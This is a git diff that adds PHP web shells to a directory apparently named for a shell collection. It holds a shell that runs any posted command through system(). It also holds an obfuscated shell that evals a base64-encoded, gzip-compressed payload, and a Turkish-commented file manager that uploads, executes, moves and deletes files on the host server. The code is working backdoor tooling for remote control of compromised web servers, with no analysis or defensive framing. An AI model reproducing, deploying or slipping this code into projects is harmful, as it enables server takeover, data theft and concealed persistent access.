+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
+
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
+  </TR>  
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
+  </TR>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+
+<font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
+</font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
+<font face="courier new" size="2" color="777777">cmd : 
+<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
+<br>
+<INPUT TYPE="submit">
+</font></FORM>
+
+<hr color=777777 width=100% height=115px>
+
+<pre>
+<?
+$cmd = $_POST['cmd'];
+  if (isset($chdir)) @chdir($chdir);
+  ob_start();
+  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
+  $output = ob_get_contents();
+  ob_end_clean();
+  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+exit;
+?>
+</pre>
diff --git a/xakep-shells/PHP/hidshell.php.php.txt b/xakep-shells/PHP/hidshell.php.php.txt
new file mode 100644
index 0000000..3e43158
--- /dev/null
+++ b/xakep-shells/PHP/hidshell.php.php.txt
@@ -0,0 +1 @@
+<?$d='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';eval(gzuncompress(base64_decode('eNpdUGFrwjAQ/SslZLRFpHPMfdCkFfYDJsxvY5PYnGshTbIm1bnS/76LVZj7csl7vHvv7qhVfOV8q0An1ArneO0c+IRu1y+vm7c4UPF7WjRy/p9bJLfSSrgqSG/xInTGcZqmS/onSvKdcPD0uJVQGglIoGBv2oRqfr+kmlGFdTJJeyp7qgdeVm1iWpmMMP04/8MkCO+oVQP2D/U+OK8+fzpdmsa24NzZuYeDUAkpcipZQVAIykFf5KzyjcIKQuasAS+iyns7ha+uPnDybLQH7aebkwUSlSPixMO3z0LjMior0eIJ+LHW0hzddPYwn5Gc+doryNc43BHHZNmIWTbm7Iw85axEL2hzhjs3EUZXRnISDof9tbadjzzGcmIvLiTSorlgEmW3Itftmtqf6SwY4nP1z8a4bNy0GH4BG4Kl3A==')));?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/iMHaPFtp.php.php.txt b/xakep-shells/PHP/iMHaPFtp.php.php.txt
new file mode 100644
index 0000000..2c003b7
--- /dev/null
+++ b/xakep-shells/PHP/iMHaPFtp.php.php.txt
@@ -0,0 +1,2061 @@
+<?php
+/*
+ * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
+ * Copyright (C) 2003-2005  iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
+ *
+ * Bu Kod Tamamiyle �zg�r Yazilimdir.
+ * K�t� Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
+ * Programin amaci ftp olmadan hostunuza baglanti kurup 
+ * Dosya ekleyip kaldira bilmektir.
+ * Kodumuz 6 Dilde yazilmistir.Server Diline G�re Otomatik Secim Yapar.
+ * -------------------------------------------------------------------------
+ * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
+ * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
+ * -------------------------------------------------------------------------
+ *
+ * iMHaBiRLiGi PhpFtp V1.1
+ * =========================================================================
+ *
+ * BeweiS
+ * <BeweiS@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve G�venlik
+ *
+ * MicroP_
+ * <MicroP_@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve G�venlik
+ *
+ * Libertical
+ * <libertical@imhabirligi.com>
+ *    iMHaBiRLiGi Y�netim
+ *    C++, Delphi,Programlama ve Linux Hastasi
+ *
+ * PowerGhost
+ * <powerghost@imhabirligi.com>
+ *    iMHaBiRLiGi Sistem Danismani
+ *    Sistem Danismani
+ *    
+ *  BadSector
+ *  ozgurkaleli@yahoo.com
+ *  iMHaBiRLiGi Y�netim
+ *   VicualBasic-Delphi Programlama
+ *   Sistemdanismani ve Linux Hastasi
+ *
+ * Bu kodun yaziliminda ismi gecen her arkadasimizin
+ * Katkilari bulunmustur.
+ * Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize
+ * Katkida bulunmuslardir.
+ * NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz
+ * http://www.imhabirligi.com
+ *<iMHaBiRLiGi@imhabirligi.com>
+/* ------------------------------------------------------------------------- */
+
+/* Diller :
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'se' - Swedish
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of your filenames:
+ */
+$charset = 'ISO-8859-1';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the D�zenle textarea
+ */
+$D�zenlecols = 80;
+$D�zenlerows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (reTasi # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'indir':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) {
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			D�zenle($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'Sil':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Sild', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Sild', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_Sil') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Degistir':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (!@file_exists($dest) && @Degistir($file, $dest)) {
+			listing_page(notice('Degistird', $file, $dest));
+		} else {
+			listing_page(error('not_Degistird', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="Degistir" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('Degistir_file') . '</b>
+	<p>' . html($file) . '</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" />
+	<input type="submit" value="' . word('Degistir') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Tasi':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @Degistir($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Tasid', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Tasid', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('Tasi_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Tasi') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Kopyala':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @Kopyala($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
